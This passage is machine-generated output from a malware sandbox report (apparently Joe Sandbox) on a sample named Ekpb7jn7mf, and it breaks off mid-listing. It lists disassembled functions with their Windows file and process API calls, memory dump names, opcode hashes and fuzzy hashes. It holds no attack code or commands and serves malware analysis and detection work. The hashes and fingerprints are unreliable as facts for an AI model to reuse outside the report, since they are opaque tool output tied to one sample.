                                                                                  • String ID:
                                                                                  • API String ID: 1264268182-0
                                                                                  • Opcode ID: 3478f9e89b29c03405a6adbc8e8381d4b5206ec0b1a49669d22f402693bedd24
                                                                                  • Instruction ID: 3cceb8025a7d4aeead261000b78fa94cc5fb3de44e4d38a2e590eddc4ad324aa
                                                                                  • Opcode Fuzzy Hash: 3478f9e89b29c03405a6adbc8e8381d4b5206ec0b1a49669d22f402693bedd24
                                                                                  • Instruction Fuzzy Hash: 8FF0E23064021962CF047762EC0AACE3B986F42798B18443BEC54920A2DBADAAD5859E
                                                                                  Function 00408FAD Relevance: 3.0, APIs: 2, Instructions: 32COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SetFileAttributesW.KERNELBASE(00000000,00000000,74DF3110,00000001,?,0040925D,00000000,?,?,0040933E,?,00000001,00000000,?,?), ref: 00408FC8
                                                                                  • SetFileAttributesW.KERNEL32(?,00000000,00000000,?,00000800,?,0040925D,00000000,?,?,0040933E,?,00000001,00000000,?,?), ref: 00408FF5
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: AttributesFile
                                                                                  • String ID:
                                                                                  • API String ID: 3188754299-0
                                                                                  • Opcode ID: 0d9f3cd0aba901f52d22e7fc9097910621589f24df853318d5af2ba87b6fa5e9
                                                                                  • Instruction ID: f32d49dd2ae8b58c0c40083fb3defa4b541d68cc1025cec9ed250b126f692f27
                                                                                  • Opcode Fuzzy Hash: 0d9f3cd0aba901f52d22e7fc9097910621589f24df853318d5af2ba87b6fa5e9
                                                                                  • Instruction Fuzzy Hash: 4FF0A73114123E66DF016A658C01FDE3B6DAF043D4F048027BC84A7191DB75DDA59AA4
                                                                                  Function 00409004 Relevance: 3.0, APIs: 2, Instructions: 30fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • DeleteFileW.KERNELBASE(?,?,-00000011,?,0040869F,?,?,00000001,?,?,?,?,?,?,00000000,?), ref: 0040901C
                                                                                  • DeleteFileW.KERNEL32(?,?,?,00000800,?,0040869F,?,?,00000001,?,?,?,?,?,?,00000000), ref: 00409046
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: DeleteFile
                                                                                  • String ID:
                                                                                  • API String ID: 4033686569-0
                                                                                  • Opcode ID: 90451938786b7f59172b0c811631159dade1dd164b308dfaaa0a80e1040f6e92
                                                                                  • Instruction ID: a13a883a1f6153248d7ef179cdd29017bd0aa464b96f45660c3251f7b49a4acf
                                                                                  • Opcode Fuzzy Hash: 90451938786b7f59172b0c811631159dade1dd164b308dfaaa0a80e1040f6e92
                                                                                  • Instruction Fuzzy Hash: CCE02B3114222DA6DB1066218C01FDE3B6C5F043C0F0440737C84A31D1DB79EC9189A5
                                                                                  Function 0040DCAF Relevance: 3.0, APIs: 2, Instructions: 28COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: ItemText_swprintf
                                                                                  • String ID:
                                                                                  • API String ID: 3011073432-0
                                                                                  • Opcode ID: f462540bee88420ba8de915a207eadb7e78809dfaab5b3a47c540e35977eae7d
                                                                                  • Instruction ID: 51d718bbcdad2d3c0e38940bd9655f966f128ec5ed9968088acb2aee9960783c
                                                                                  • Opcode Fuzzy Hash: f462540bee88420ba8de915a207eadb7e78809dfaab5b3a47c540e35977eae7d
                                                                                  • Instruction Fuzzy Hash: 0AF05C31A1030876EB01B7B18D43F8E366C4705789F04057AB700730E1D5795931875E
                                                                                  Function 00408F61 Relevance: 3.0, APIs: 2, Instructions: 28COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetFileAttributesW.KERNELBASE(?,?,?,?,004091CE,?,00406720,?,?,?,?), ref: 00408F79
                                                                                  • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,?,?,004091CE,?,00406720,?,?,?,?), ref: 00408FA1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: AttributesFile
                                                                                  • String ID:
                                                                                  • API String ID: 3188754299-0
                                                                                  • Opcode ID: d44052b13896b8b2efb6b8bfc698ce1e12285283b25508e3535b24f355f29611
                                                                                  • Instruction ID: 92e1726b443e00eb3ee6414bf043f798e9f7245f272599e856072e2678fdb8df
                                                                                  • Opcode Fuzzy Hash: d44052b13896b8b2efb6b8bfc698ce1e12285283b25508e3535b24f355f29611
                                                                                  • Instruction Fuzzy Hash: A0E09B7260011C26DB10A769CC01FDD77ADAB8C3B5F044077B944E31D0DAB8DD968BA4
                                                                                  Function 00410CA7 Relevance: 3.0, APIs: 2, Instructions: 27COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetCurrentProcess.KERNEL32(?,?,?,?,?,00410CE3,00409F14), ref: 00410CB4
                                                                                  • GetProcessAffinityMask.KERNEL32(00000000), ref: 00410CBB
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: Process$AffinityCurrentMask
                                                                                  • String ID:
                                                                                  • API String ID: 1231390398-0
                                                                                  • Opcode ID: dcf7491ca214860e487e77938373b098f05fcf341780650e92e05a1f8534bf3b
                                                                                  • Instruction ID: e5f39edb2d65f6a1d41532f442d8ed9e2f6a737e4aba591fa598ebba9ce63b28
                                                                                  • Opcode Fuzzy Hash: dcf7491ca214860e487e77938373b098f05fcf341780650e92e05a1f8534bf3b
                                                                                  • Instruction Fuzzy Hash: 8AE08076610106AB8F1C57B4CD055EF725CE701305710457BE403D1200F5A4D5C15BE9
                                                                                  Function 00419E2F Relevance: 3.0, APIs: 2, Instructions: 21COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • FreeLibrary.KERNELBASE(00000000,00000000,00438820,0040FE7C), ref: 00419E40
                                                                                  • FreeLibrary.KERNELBASE(?,00000000,00438820,0040FE7C), ref: 00419E4A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: FreeLibrary
                                                                                  • String ID:
                                                                                  • API String ID: 3664257935-0
                                                                                  • Opcode ID: 0d62cf78e3bdc661a2f82cba813f0a1a4c9abef6bee34bc7d64aa9ac4bab2991
                                                                                  • Instruction ID: e9e9cc9e75335fbaa328bc5dbfdccc89299fc13d4448708a46788c35bb3e456b
                                                                                  • Opcode Fuzzy Hash: 0d62cf78e3bdc661a2f82cba813f0a1a4c9abef6bee34bc7d64aa9ac4bab2991
                                                                                  • Instruction Fuzzy Hash: 14E0E635701210DB8621EF69DC04997F3ECAF85711315446AE804D3350C774EC418AA9
                                                                                  Function 004060C1 Relevance: 3.0, APIs: 2, Instructions: 11COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: ItemShowWindow
                                                                                  • String ID:
                                                                                  • API String ID: 3351165006-0
                                                                                  • Opcode ID: 4831fce4d73d936a96b8da5e650052ed61dc757b3f02978e41a04ced16bb9e28
                                                                                  • Instruction ID: bb8df4f73c5df098251a309fe1c33c8504d4bfd4afe98da2c54c19901aad4cc9
                                                                                  • Opcode Fuzzy Hash: 4831fce4d73d936a96b8da5e650052ed61dc757b3f02978e41a04ced16bb9e28
                                                                                  • Instruction Fuzzy Hash: 9FC01232258201FFCB010BB0DC09D2ABFACABA4212F00CA68B8A5C0161C23AC020DB62
                                                                                  Function 004060A3 Relevance: 3.0, APIs: 2, Instructions: 8COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetDlgItem.USER32(?,?), ref: 004060B1
                                                                                  • KiUserCallbackDispatcher.NTDLL(00000000), ref: 004060B8
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: CallbackDispatcherItemUser
                                                                                  • String ID:
                                                                                  • API String ID: 4250310104-0
                                                                                  • Opcode ID: 10473aa6b390d4c6f4367ea588a870e2b335c57c20f02c17b48037ae3329eebf
                                                                                  • Instruction ID: 1aa957cd52260ed364119c24255e18d6411bf3cbccacf3a019d43f62ef9d5eea
                                                                                  • Opcode Fuzzy Hash: 10473aa6b390d4c6f4367ea588a870e2b335c57c20f02c17b48037ae3329eebf
                                                                                  • Instruction Fuzzy Hash: 4BC04C76508240FFCB115BA09D08C2FBFADAF98311F50C859B9A581121C636C421DB26
                                                                                  Function 00421299 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • ___crtCorExitProcess.LIBCMT ref: 004212A1
                                                                                    • Part of subcall function 0042126E: GetModuleHandleW.KERNEL32(mscoree.dll,?,004212A6,00000000,?,0041CD27,000000FF,0000001E,?,004210A4,00000000,00000001,00000000,?,0041ECDD,00000018), ref: 00421278
                                                                                    • Part of subcall function 0042126E: GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00421288
                                                                                  • ExitProcess.KERNEL32 ref: 004212AA
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: ExitProcess$AddressHandleModuleProc___crt
                                                                                  • String ID:
                                                                                  • API String ID: 2427264223-0
                                                                                  • Opcode ID: 21a27a63abf6c3875c02e94f35324880841d9b00b93dc530bda6b4d16cfe0508
                                                                                  • Instruction ID: c6812d1777e32e585e2ef8636d69d3407a4dd70a4b54595152d0a3a8b2406f89
                                                                                  • Opcode Fuzzy Hash: 21a27a63abf6c3875c02e94f35324880841d9b00b93dc530bda6b4d16cfe0508
                                                                                  • Instruction Fuzzy Hash: 5EB09231204148BFDB112F12EC0A85D3F2AEB807A0BA04025FC084A072DF72EDA2DAD9
                                                                                  Function 00402C8F Relevance: 1.7, APIs: 1, Instructions: 172COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog
                                                                                  • String ID:
                                                                                  • API String ID: 3519838083-0
                                                                                  • Opcode ID: 2421c4f90e7814d60c036d7d1e238915adf895873ea2564b94cd26f126ff620e
                                                                                  • Instruction ID: 742206060651fc025572fd1eb548bf5572dfcfe9c4a596cdf26dc89aeb9e180e
                                                                                  • Opcode Fuzzy Hash: 2421c4f90e7814d60c036d7d1e238915adf895873ea2564b94cd26f126ff620e
                                                                                  • Instruction Fuzzy Hash: C8612570505744ABDB34DB79C989BEBB7E4AF41304F00496FF5AB622C2CBB82944CB19
                                                                                  Function 0041790C Relevance: 1.6, APIs: 1, Instructions: 105COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog
                                                                                  • String ID:
                                                                                  • API String ID: 3519838083-0
                                                                                  • Opcode ID: 79c241710036945b0e8c1d7d32c4cb15439dc8290ce9352ac8db3af8127058bf
                                                                                  • Instruction ID: be647cb3fd71d12650130d9a698408558a82919b25c6e51b47c3e11cfe21f77e
                                                                                  • Opcode Fuzzy Hash: 79c241710036945b0e8c1d7d32c4cb15439dc8290ce9352ac8db3af8127058bf
                                                                                  • Instruction Fuzzy Hash: BA31B6B2A141058BDB14DF59C9826EDB7F1EF95308B10442FD096E7342D73E9D85CB68
                                                                                  Function 0040927F Relevance: 1.6, APIs: 1, Instructions: 80COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: _wcsncpy
                                                                                  • String ID:
                                                                                  • API String ID: 1735881322-0
                                                                                  • Opcode ID: 22205a8470e74219309dd66db67576da41e8cb33cbd043dad4ed0d8e077d1d56
                                                                                  • Instruction ID: e5a65c93cd06a23b3edbbe9bd77c12815be82857be03b7caa808787e9d51beb7
                                                                                  • Opcode Fuzzy Hash: 22205a8470e74219309dd66db67576da41e8cb33cbd043dad4ed0d8e077d1d56
                                                                                  • Instruction Fuzzy Hash: 9B21F9315012156ADF309AA5C886BDE73A99F4A744F104077FD84F71C2E6BCADC58B58
                                                                                  Function 00408D23 Relevance: 1.5, APIs: 1, Instructions: 36COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog
                                                                                  • String ID:
                                                                                  • API String ID: 3519838083-0
                                                                                  • Opcode ID: 81fb3a6f0b2dadf3925ad1a8b3a294dd36e0657d826e3ecd61b285badfde8637
                                                                                  • Instruction ID: 3b0f654ca84f9b00b74004c7f9d6528193aeb6f532f40180d9f0fe85922b7209
                                                                                  • Opcode Fuzzy Hash: 81fb3a6f0b2dadf3925ad1a8b3a294dd36e0657d826e3ecd61b285badfde8637
                                                                                  • Instruction Fuzzy Hash: 01F04F35B002149FD7149F58CC89FADF7B5FF48724F208199E912A73D1CB799D018A54
                                                                                  Function 00408952 Relevance: 1.5, APIs: 1, Instructions: 32COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • FindCloseChangeNotification.KERNELBASE(?,74DF20B0,00000000,004085AD,?,?,?,?,0040736D,?,00000000,?,00000800,?,?,?), ref: 0040896D
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: ChangeCloseFindNotification
                                                                                  • String ID:
                                                                                  • API String ID: 2591292051-0
                                                                                  • Opcode ID: fa28e57e717c14776fcc15f50cb58b478873ae3328fd3a4ffbe1696e0b816d3d
                                                                                  • Instruction ID: e341fdcc8387c91c0e5d0cb21e7631946c13a32fabfeae03377b8c24d8ce50d2
                                                                                  • Opcode Fuzzy Hash: fa28e57e717c14776fcc15f50cb58b478873ae3328fd3a4ffbe1696e0b816d3d
                                                                                  • Instruction Fuzzy Hash: 14F027B0542B144FD730663956487E373D85B15735F08972FE9E2A33C1C77C5C484A56
                                                                                  Function 0040550A Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 0040550F
                                                                                    • Part of subcall function 00409F46: __EH_prolog.LIBCMT ref: 00409F4B
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog
                                                                                  • String ID:
                                                                                  • API String ID: 3519838083-0
                                                                                  • Opcode ID: a0e0482eef27e39e818fc372b98a5a9e5281770223a349f829680370df9cb11d
                                                                                  • Instruction ID: 4f7029223cc9bfe80eb94b922fb7cc38893bf222af06625d23a75974d8a968ff
                                                                                  • Opcode Fuzzy Hash: a0e0482eef27e39e818fc372b98a5a9e5281770223a349f829680370df9cb11d
                                                                                  • Instruction Fuzzy Hash: 03018C30905790DAC705E7A5C2117EDB7A4AF2430CF1044DEA456632C3CBB82B88CB6B
                                                                                  Function 004095DC Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00409FC4: _wcspbrk.LIBCMT ref: 00409FD5
                                                                                  • FindClose.KERNELBASE(00000000,00000800,000000FF,?,?,?,?,00408331,?,?,00000000,?,00000800), ref: 0040960C
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
